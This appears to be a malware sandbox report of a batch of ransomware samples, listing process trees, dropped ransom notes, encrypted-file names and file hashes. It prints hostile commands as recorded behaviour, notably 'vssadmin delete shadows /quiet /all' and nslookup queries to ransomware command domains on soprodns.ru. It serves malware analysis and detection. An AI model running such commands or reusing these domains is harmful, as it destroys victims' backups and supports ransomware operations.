                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          nslookup nomoreransom.coin dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\nslookup.exe
    nslookup nomoreransom.bit dns1.soprodns.ru
    3⤵
      PID:5852
  • C:\Windows\SysWOW64\nslookup.exe
    nslookup gandcrab.bit dns2.soprodns.ru
    3⤵
      PID:3528
  • C:\Windows\SysWOW64\nslookup.exe
    nslookup nomoreransom.coin dns2.soprodns.ru
    3⤵
    • System Location Discovery: System Language Discovery
      PID:6604
  • C:\Windows\SysWOW64\nslookup.exe
    nslookup nomoreransom.bit dns2.soprodns.ru
    3⤵
      PID:4920
  • C:\Windows\SysWOW64\nslookup.exe
    nslookup gandcrab.bit dns1.soprodns.ru
    3⤵
      PID:5148
  • C:\Windows\SysWOW64\nslookup.exe
    nslookup nomoreransom.coin dns1.soprodns.ru
    3⤵
      PID:3568
  • C:\Windows\SysWOW64\nslookup.exe
    nslookup nomoreransom.bit dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        nslookup gandcrab.bit dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          nslookup nomoreransom.coin dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            nslookup nomoreransom.bit dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              nslookup gandcrab.bit dns1.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2844
    • C:\Windows\SysWOW64\nslookup.exe
      nslookup nomoreransom.coin dns1.soprodns.ru
      3⤵
      PID:996
    • C:\Windows\SysWOW64\nslookup.exe
      nslookup nomoreransom.bit dns1.soprodns.ru
      3⤵
      PID:4852
    • C:\Windows\SysWOW64\nslookup.exe
      nslookup gandcrab.bit dns2.soprodns.ru
      3⤵
      PID:4560
  • C:\Users\Admin\Desktop\00361\VHO-Trojan-Ransom.Win32.Blocker.gen-3e71c7978b347b083b97b0d14380576600507e2e9f7807ce6f7a8dafdad4bbe1.exe
    VHO-Trojan-Ransom.Win32.Blocker.gen-3e71c7978b347b083b97b0d14380576600507e2e9f7807ce6f7a8dafdad4bbe1.exe
    2⤵
    • Executes dropped EXE
    PID:300
    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
      dw20.exe -x -s 408
      3⤵
      PID:1672
• C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  1⤵
  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 7DF3AD27F19FD4C48147CF24C929D7C0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\MsiExec.exe -Embedding DCDC0F430EB6A353DF29AD8C6CC05FA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
  PID:4760
• C:\Windows\system32\conhost.exe
  \??\C:\Windows\system32\conhost.exe "133399801216031201-147493349014578165835155292041638358000-127155838826300625"
  1⤵
  PID:2092
• C:\Windows\system32\cmd.exe
  cmd.exe /c vssadmin.exe delete shadows /quiet /all
  1⤵
  • Process spawned unexpected child process
  PID:5396
• C:\Windows\system32\vssadmin.exe
  vssadmin.exe delete shadows /quiet /all
  2⤵
  • Interacts with shadow copies
  PID:4884
• C:\Windows\system32\conhost.exe
  \??\C:\Windows\system32\conhost.exe "-10444766091698327875-11503326141018378037368300830-1611623668-124991212625562444"
  1⤵
  PID:5020
• C:\Windows\system32\conhost.exe
  \??\C:\Windows\system32\conhost.exe "-1258444727-788235808-559152050-2122983086818950372103064142615181853801060866594"
  1⤵
  PID:2440
• C:\PROGRA~2\MICROS~1\Office14\OUTLOOK.EXE
  C:\PROGRA~2\MICROS~1\Office14\OUTLOOK.EXE -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "966904153-1011408285-1196582715-6937493612107977374-17982595641642544864-1633894502"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    taskeng.exe {552F3E7E-B55B-41A4-92A6-28DA9637EA7C} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
    PID:5884
• C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x488
  1⤵
    PID:1420
• C:\Windows\system32\LogonUI.exe
  "LogonUI.exe" /flags:0x0
  1⤵
    PID:6792
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  1⤵
    PID:3780
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  1⤵
    PID:5312

Network

MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Downloads

  • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.msi.id-DA208E5B.[[email protected]].gamma

    Filesize

    24.4MB

  • C:\Program Files (x86)\Adobe\Reader 9.0\Esl\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT

    Filesize

    3KB

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\я

    Filesize

    1B


  • C:\Program Files (x86)\Microsoft Office\Office14\1033\#Decrypt_Files_ReadMe#.rtf

    Filesize

    19KB


  • C:\ProgramData\Adobe\Updater6\!HELP_SOS.hta

    Filesize

    91KB

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

    Filesize

    914B


  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    1KB


  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

    Filesize

    252B


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              02ccf7bb6a7b4031f3e929a35adee9d23062fda9a26a09930bda70244168a55f049a3994dcc42ae39d794cee40fbf0722807ed2366b0992b3e6ee98eff566d33

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B


  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              28b816ed8ad5d812304b0f667a7cc8a289d7753e68ea921b020b82de461dd6c6f69cde68dbd82b24e08ffbeebe7d015413cb75c56463960867d082b879f103d0

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B


  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              45542b6562d9006d4f37ff8839a7137a693139c916b4e1d72cba163f526c6dcb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              976763a13253cb0824a7b29de76a498983f1abc24b4528ae66f89d28c15e6e8d343e733e9bfa1d5312d102f049bb933a11fb2606aedaa3d43c5200206a99e477

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              05d3745427146257d06fe0104d29602cb1f7bb6360a6afdc9038f80e3cbff698

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ac679efc864103cc7c1ba88a65e7ba5d6c8d8978ea990680b6186b3fbec186826a2640b55763f4ae50e86a08075d99793b6984d36a51bacf68cfbd114ee9742d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B


  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

  Filesize: 342B

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

  Filesize: 342B

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

  Filesize: 242B

• C:\Users\Admin\AppData\Local\Temp\Cab3AC1.tmp

  Filesize: 70KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1723be06719828dda65ad804298d0431f6aff976

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar3E1E.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\f1.vbs

    Filesize

    3KB

  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\storage\[HOW_TO_DECRYPT_FILES].html

    Filesize

    8KB

• C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe

  Filesize

  61KB

• C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe

  Filesize

  319KB

• C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe

  Filesize

  736KB


• C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe

  Filesize

  228KB


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              520KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              7dbd73bd2dac0cd58bffc7195471b1b8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              e0a8fa034aad2d6f09173f02a9005accd7a516df

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              51a569a7fdc143760c078237a0e4889be8dbdf7883c92aed22a8c9f3feba4808223caab2ab7b0545467fca929dcbd18e179a3cc3a92db235a1b3d27806ab0106

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              962KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              524565f13ff3b4726d9af906682226f8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1


